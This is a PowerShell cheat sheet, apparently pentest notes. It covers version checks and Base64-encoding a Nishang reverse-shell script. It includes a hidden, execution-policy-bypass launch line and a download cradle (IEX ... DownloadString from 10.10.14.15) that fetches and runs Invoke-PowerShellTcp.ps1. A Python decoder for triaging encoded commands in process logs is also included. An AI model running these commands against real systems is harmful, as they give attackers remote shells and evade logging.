
Powershell Scripts

Basics

Powershell version

$PSVersionTable.PSVersion

Powershell 64-bit or 32-bit

Check the operating system:

[environment]::Is64BitOperatingSystem

Check the current process:

[environment]::Is64BitProcess

Example: (screenshot of the two checks and their output, not preserved here)

If the OS is 64-bit but the current process is 32-bit, you can relaunch PowerShell by specifying the path of the 64-bit powershell.exe. Note that the SysNative alias below is resolved by WOW64 file-system redirection, so it only works from a 32-bit process; a 64-bit process sees the same files under C:\Windows\System32.

Powershell 64bit

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe

Powershell - Encode & Decode

Convert ps1 to base64

# Read the script as a single string (Invoke-PowerShellIcmp.ps1 is a Nishang script)
$RevShell = Get-Content -Raw ./Invoke-PowerShellIcmp.ps1
# Encode as UTF-16LE (.NET "Unicode"), which is what -EncodedCommand expects
$bytes = [System.Text.Encoding]::Unicode.GetBytes($RevShell)
$Encoded = [Convert]::ToBase64String($bytes)

Get the raw content -> encode it to UTF-16LE ("Unicode") bytes -> convert the bytes to Base64. UTF-16LE is required because powershell.exe -EncodedCommand decodes its argument as UTF-16LE, not UTF-8.

Convert base64 to ps1

Decoding the above encoded string (Base64 -> UTF-16LE bytes -> text):

$Decode = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))

Encode a ps1 file to Base64 on Linux

# iconv produces UTF-16LE without a BOM; -w 0 keeps the Base64 on one line
cat 1shell.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w 0

Then execute the above output with the following (-nop: no profile, -W hidden: hidden window, -noni: non-interactive, -ep bypass: execution policy bypass, -e: encoded command):

powershell -nop -W hidden -noni -ep bypass -e <base64-code-from-above-output>
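The same encoding in reverse, from a triage point of view: a command line like the one above ends up in process-creation logs, and an analyst needs to recover the script from the -e argument. The following is an added example (not from the original page) that mirrors the page's encode step, decodes the UTF-16LE Base64 argument back to text, and checks it for a few constructed indicators; the SAMPLE_CMDLINE is constructed from the page's own download cradle.

```python
import base64
from typing import Optional

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# "-e", "-enc" and "-EncodedCommand" all select EncodedCommand ("-ep" does not).
ENCODED_PARAM = "encodedcommand"

# Constructed triage indicators; extend with whatever your detections need.
INDICATORS = ("New-Object Net.WebClient", "DownloadString", "IEX", "Invoke-Expression")


def encode_command(script: str) -> str:
    """Mirror of the page's encode step: UTF-16LE bytes -> Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Reverse it: Base64 -> UTF-16LE text. Tolerates missing '=' padding."""
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the argument that follows an EncodedCommand-style switch in a
    recorded process command line, or None if there is none."""
    tokens = cmdline.split()  # Base64 never contains whitespace
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if name and ENCODED_PARAM.startswith(name):
            return tokens[i + 1].strip("\"'")
    return None


def triage(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and list matched indicators."""
    encoded = extract_encoded_command(cmdline)
    if encoded is None:
        return {"encoded": False, "script": None, "indicators": []}
    script = decode_command(encoded)
    hits = [ind for ind in INDICATORS if ind.lower() in script.lower()]
    return {"encoded": True, "script": script, "indicators": hits}


# Constructed sample: the page's Nishang cradle wrapped exactly as shown above.
SAMPLE_CMDLINE = "powershell -nop -W hidden -noni -ep bypass -e " + encode_command(
    "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.15/Invoke-PowerShellTcp.ps1')"
)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Command lines of this shape are recorded in Windows Security event 4688 (with command-line auditing enabled) or Sysmon Event ID 1, which is where this decoder would normally be pointed.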

Powershell - reverse shell - Nishang

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/Invoke-PowerShellTcp.ps1')